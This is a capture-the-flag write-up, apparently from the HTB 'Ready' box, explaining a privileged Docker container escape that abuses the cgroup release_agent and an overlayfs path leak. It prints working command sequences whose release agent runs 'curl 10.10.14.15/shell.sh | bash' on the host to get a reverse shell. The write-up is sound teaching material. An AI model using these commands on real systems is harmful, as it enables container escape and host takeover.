Digging into cgroups Escape

The method I used in Ready to get code execution on the host system from a docker container running as privileged was a series of bash commands that didn’t make any sense on first glance. I wanted to dive into them and see what was happening under the hood.

Background

POCs

The privileged Docker container escape POC I used looked like this:

root@gitlab:~# d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
root@gitlab:~# mkdir -p $d/w;echo 1 >$d/w/notify_on_release
root@gitlab:~# t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
root@gitlab:~# echo $t/c >$d/release_agent;printf '#!/bin/sh\ncurl 10.10.14.15/shell.sh | bash' >/c;
root@gitlab:~# chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";

To explain how this works, I’ll use a slightly different version of the POC (from the same article) because it’s a bit easier to follow:

mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "curl 10.10.14.15/shell.sh | bash" >> /cmd
chmod a+x /cmd
sh -c "echo $$ > /tmp/cgrp/x/cgroup.procs"

Both POCs take the same steps:

Find or create an access to the RDMA cgroup controller.
Create a new cgroup within that controller.
Register notify_on_release for that cgroup, and set the release agent to a file accessible via both the container and host.
Start a quickly completing process within that cgroup that triggers execution of the release agent on termination.

cgroups

The first thing to understand is the idea of cgroups. It’s a Linux kernel feature that isolates CPU (and other resource) usage to a collection of processes within the cgroup. Julia Evans has a zine describing cgroups:

Click for full size image

cgroups are not exclusive to Docker, but they are used by Docker. This neat Medium post on Docker Internals goes into a lot more detail about how Docker uses cgroups for resource allocation.

overlayfs

The other concept that comes into play here is overlayfs, a “union mount filesystem” implementation in Linux. In overlayfs, there are two directories, upper and lower, that are merged to create another directory that represents the combination of the two. Julia Evans has another really helpful zine for overlayfs (she’s such a good resource!):

Click for full size image

Julia has a post that goes into more detail with examples as well. The idea is that you can mount two file paths such that they create a third merged result. For example, the lower might be a container base image, and the upper might be changes made inside the container. In the merged result, if the file exists in both upper and lower, it shows the one from upper. If it doesn’t exist in upper, it shows the one from lower.

What’s important to know here is that by leaking the host’s filepath to the upper directory used for the docker container, I can write something in the container, and know where it will be on the host.

Steps

Find / Create cgroup Controller

The first two commands (of three) in the first line in the POC is creating a directory, and mounting it as an RDMA cgroup controller (mount -t cgroup -o rdma):

mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

It uses the RDMA cgroup, but others would works as well (there’s a list in the cgroups man page). In the Trail of Bits post they show an error that comes up when there is no RDMA cgroup, and suggest just changing rdma to memory to continue in another cgroup.

The original POC finds an existing mount of the rdma cgroup controller using a somewhat obfuscated ls command:

root@gitlab:~# dirname $(ls -x /s*/fs/c*/*/r* |head -n1)    
/sys/fs/cgroup/rdma

cgroup controllers are global resources, and mounting it again here inside the container gives access to the same controller in the host. Changes made here will be reflected in the host’s RDMA controller. Without being privileged, a container won’t have access to this.

Create New cgroup

Next, each POC creates a cgroup (directory) in that mount, x (or w in the original POC):

mkdir /tmp/cgrp/x

mkdir -p $d/w;

On just creating the directory, several files are created:

root@gitlab:~# ls /tmp/cgrp/x/
cgroup.clone_children  notify_on_release  rdma.max
cgroup.procs           rdma.current       tasks

Configure Release

The next command is to write a 1 to notifiy_on_release, which enables cgroup notifications on release:

If the notify_on_release flag is enabled (1) in a cgroup, then
whenever the last task in the cgroup leaves (exits or attaches to
some other cgroup) and the last child cgroup of that cgroup
is removed, then the kernel runs the command specified by the contents
of the "release_agent" file in that hierarchy's root directory,
supplying the pathname (relative to the mount point of the cgroup
file system) of the abandoned cgroup.

In each POC:

echo 1 > /tmp/cgrp/x/notify_on_release

echo 1 >$d/w/notify_on_release

The majority of the remaining commands are dedicated to setting the release agent. This is what will get run on the release notification. First, the POC needs to find the mapping so that the host can reference a file written in the container. /etc/mtab has a list of all the mount points for the system, to include the overlayfs mount:

root@gitlab:~# grep upper /etc/mtab   
overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/GIXQ4D2FJ63I5OGALTCGDBK6KT:/var/lib/docker/overlay2/l/PZB5MARGIAOF6N5AAJNTVUFS52:/var/lib/docker/overlay2/l/4KSUGTOLFYSBJFJQH2NUGVL54R:/var/lib/docker/overlay2/l/PJ4IKL6MDRM2ZSGFRAXCVHVLUR:/var/lib/docker/overlay2/l/XLLFVBBMKEEE672BOIVTSZ5XQZ:/var/lib/docker/overlay2/l/33JTQXWWPTNINADNR6R3YM47KY:/var/lib/docker/overlay2/l/XG5BUSKVZNINSBJD2J7MMLU5A3:/var/lib/docker/overlay2/l/ZI5Y7RO6WUTDK3DQVTUTOA2ZWI:/var/lib/docker/overlay2/l/SRZJCUXAPFOW35HRDPW7OHQWXN:/var/lib/docker/overlay2/l/SLR2WWC4VRYMZRPZ6EHZQSLNYS:/var/lib/docker/overlay2/l/SJBEI24D42KKTO5Z54GMKQPPXO,upperdir=/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff,workdir=/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/work,xino=off 0 0

The next command in the POC uses sed to get just the string that is the upperdir path:

host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`

Running that shows where on the host filesystem the container files are:

root@gitlab:~# sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab
/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff

As an experiment, I’ll create a file in the root home dir on the container:

root@gitlab:~# echo "0xdf was here" > 0xdf 

With an SSH shell as root on the host, I can see that file shows up in the upperdir:

root@ready:/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff# ls
bin  etc  home  opt  root  root_pass  run  tmp  usr  var
root@ready:/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff# cd root/
root@ready:/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff/root# ls
0xdf
root@ready:/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff/root# cat 0xdf 
0xdf was here

This helps because now I can write the release agent script (a simple reverse shell) in the container, and then call it from the host. That’s what the next few commands do. Set the file from the host’s perspective as the release_agent:

echo "$host_path/cmd" > /tmp/cgrp/release_agent

Write the reverse shell from within the container:

echo '#!/bin/sh' > /cmd
echo "curl 10.10.14.15/shell.sh | bash" >> /cmd
chmod a+x /cmd

Trigger Release

Now everything is set up so that when a process within this new cgroup terminates, it will execute the reverse shell. All I need to do now is start a process within that cgroup and then let it finish. The POC makes use of a neat trick to do that. It starts an echo process, and has that process output the PID of that process into the cgroups.procs file:

sh -c "echo $$ > /tmp/cgrp/x/cgroup.procs"

This leads to the PID being in that file, and then that echo completing, which terminates the process. The system sees that PID terminate, and finds it’s PID in the x cgroup. It removes that PID from the cgroups.procs file, and triggers the release agent.

« HTB: Ready